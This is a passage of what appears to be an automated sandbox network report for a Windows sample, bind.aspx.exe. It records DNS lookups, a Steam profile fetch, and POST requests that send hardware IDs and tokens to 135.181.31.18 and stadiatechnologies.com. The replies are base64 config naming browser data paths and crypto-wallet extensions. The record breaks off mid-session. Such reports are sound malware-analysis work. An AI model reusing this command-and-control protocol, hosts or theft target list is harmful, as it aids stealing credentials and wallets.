                                                                                                                                                                                    Sep 28, 2024 03:30:00.156244040 CEST44349721135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:00.156289101 CEST44349721135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:00.156316042 CEST49721443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:00.156342983 CEST49721443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:00.156435966 CEST49721443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:00.156459093 CEST44349721135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:00.203535080 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:00.203598022 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:00.203696966 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:00.203989983 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:00.204019070 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:00.892811060 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:00.892970085 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:00.914788008 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:00.914853096 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:00.917052984 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:00.917069912 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:01.661823034 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:01.661905050 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:01.661917925 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:01.661987066 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:01.903173923 CEST49722443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:01.903203964 CEST44349722135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:01.906142950 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:01.906196117 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:01.906254053 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:01.906635046 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:01.906652927 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:02.576697111 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:02.576776981 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:02.577234030 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:02.577244997 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:02.578916073 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:02.578922033 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.337654114 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.337735891 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.337852955 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:03.338031054 CEST49724443192.168.2.7135.181.31.18
                                                                                                                                                                                    Sep 28, 2024 03:30:03.338056087 CEST44349724135.181.31.18192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.658917904 CEST4972580192.168.2.795.164.119.162
                                                                                                                                                                                    Sep 28, 2024 03:30:03.663894892 CEST804972595.164.119.162192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.666065931 CEST4972580192.168.2.795.164.119.162
                                                                                                                                                                                    Sep 28, 2024 03:30:03.666202068 CEST4972580192.168.2.795.164.119.162
                                                                                                                                                                                    Sep 28, 2024 03:30:03.666256905 CEST4972580192.168.2.795.164.119.162
                                                                                                                                                                                    Sep 28, 2024 03:30:03.671030998 CEST804972595.164.119.162192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.671103001 CEST804972595.164.119.162192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.671287060 CEST804972595.164.119.162192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.671317101 CEST804972595.164.119.162192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:05.276869059 CEST804972595.164.119.162192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:05.277004957 CEST4972580192.168.2.795.164.119.162
                                                                                                                                                                                    Sep 28, 2024 03:30:05.320214987 CEST4972580192.168.2.795.164.119.162
                                                                                                                                                                                    Sep 28, 2024 03:30:05.325122118 CEST804972595.164.119.162192.168.2.7

                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Sep 28, 2024 03:29:38.538948059 CEST6265853192.168.2.71.1.1.1
                                                                                                                                                                                    Sep 28, 2024 03:29:38.547130108 CEST53626581.1.1.1192.168.2.7
                                                                                                                                                                                    Sep 28, 2024 03:30:03.355609894 CEST5774053192.168.2.71.1.1.1
                                                                                                                                                                                    Sep 28, 2024 03:30:03.655246019 CEST53577401.1.1.1192.168.2.7

                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                    Sep 28, 2024 03:29:38.538948059 CEST192.168.2.71.1.1.10x112aStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Sep 28, 2024 03:30:03.355609894 CEST192.168.2.71.1.1.10x5984Standard query (0)stadiatechnologies.comA (IP address)IN (0x0001)false

                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                    Sep 28, 2024 03:29:38.547130108 CEST1.1.1.1192.168.2.70x112aNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                    Sep 28, 2024 03:30:03.655246019 CEST1.1.1.1192.168.2.70x5984No error (0)stadiatechnologies.com95.164.119.162A (IP address)IN (0x0001)false

                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                    • steamcommunity.com
                                                                                                                                                                                    • 135.181.31.18
                                                                                                                                                                                    • stadiatechnologies.com

                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    0192.168.2.74972595.164.119.162806376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    Sep 28, 2024 03:30:03.666202068 CEST315OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----JEGDGIIJJECFIDHJJKKF
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: stadiatechnologies.com
                                                                                                                                                                                    Content-Length: 2653
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Sep 28, 2024 03:30:03.666256905 CEST2653OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 44 47 49 49 4a 4a 45 43 46 49 44 48 4a 4a 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37
                                                                                                                                                                                    Data Ascii: ------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------JEGDGIIJJECFIDHJJKKFContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------JEGDGIIJJECFID


                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    0192.168.2.749708104.102.49.2544436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:39 UTC119OUTGET /profiles/76561199761128941 HTTP/1.1
                                                                                                                                                                                    Host: steamcommunity.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:39 UTC1870INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                    Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:29:39 GMT
                                                                                                                                                                                    Content-Length: 34730
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Set-Cookie: sessionid=ae1ed4a2010bbff990dabe0d; Path=/; Secure; SameSite=None
                                                                                                                                                                                    Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                    2024-09-28 01:29:39 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                    2024-09-28 01:29:39 UTC16384INData Raw: 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65
                                                                                                                                                                                    Data Ascii: yWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role
                                                                                                                                                                                    2024-09-28 01:29:39 UTC3768INData Raw: 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e
                                                                                                                                                                                    Data Ascii: nActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div>
                                                                                                                                                                                    2024-09-28 01:29:39 UTC64INData Raw: 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                    Data Ascii: t --></div>... responsive_page_frame --></body></html>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    1192.168.2.749709135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:40 UTC213OUTGET / HTTP/1.1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:29:41 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:29:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    2192.168.2.749710135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:42 UTC305OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 256
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:42 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 32 44 41 39 42 44 41 30 42 30 44 32 38 36 35 38 36 36 33 30 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 2d 2d 0d
                                                                                                                                                                                    Data Ascii: ------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="hwid"A2DA9BDA0B0D2865866309-a33c7340-61ca------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------AEGIJKEHCAKFCAKFHDAA--
                                                                                                                                                                                    2024-09-28 01:29:43 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:29:43 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:29:43 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 3a1|1|1|1|3108c7c2bf1f0ac4d3c5bcc0d28a8c50|1|1|1|0|0|50000|10


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    3192.168.2.749711135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:43 UTC305OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----DHCAAEBKEGHJKEBFHJDB
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:43 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------DHCAAEBKEGHJKEBFHJDBContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------DHCAAEBKEGHJKEBFHJDBCont
                                                                                                                                                                                    2024-09-28 01:29:44 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:29:44 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:29:44 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                    Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    4192.168.2.749712135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:45 UTC305OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----GDGHIDBKJEGIECBGIEHC
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                    Host: 135.181.31.18
                                                                                                                                                                                    Content-Length: 331
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-09-28 01:29:45 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 31 30 38 63 37 63 32 62 66 31 66 30 61 63 34 64 33 63 35 62 63 63 30 64 32 38 61 38 63 35 30 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 32 38 35 37 66 66 32 33 36 30 33 37 30 39 37 36 34 65 37 65 37 65 33 65 34 66 64 36 34 62 66 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 48 49 44 42 4b 4a 45 47 49 45 43 42 47 49 45 48 43 0d 0a 43 6f 6e 74
                                                                                                                                                                                    Data Ascii: ------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="token"3108c7c2bf1f0ac4d3c5bcc0d28a8c50------GDGHIDBKJEGIECBGIEHCContent-Disposition: form-data; name="build_id"22857ff23603709764e7e7e3e4fd64bf------GDGHIDBKJEGIECBGIEHCCont
                                                                                                                                                                                    2024-09-28 01:29:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Sat, 28 Sep 2024 01:29:45 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-09-28 01:29:46 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                    Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    5192.168.2.749713135.181.31.184436376C:\Users\user\Desktop\bind.aspx.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-09-28 01:29:46 UTC305OUTPOST / HTTP/1.1
                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDG
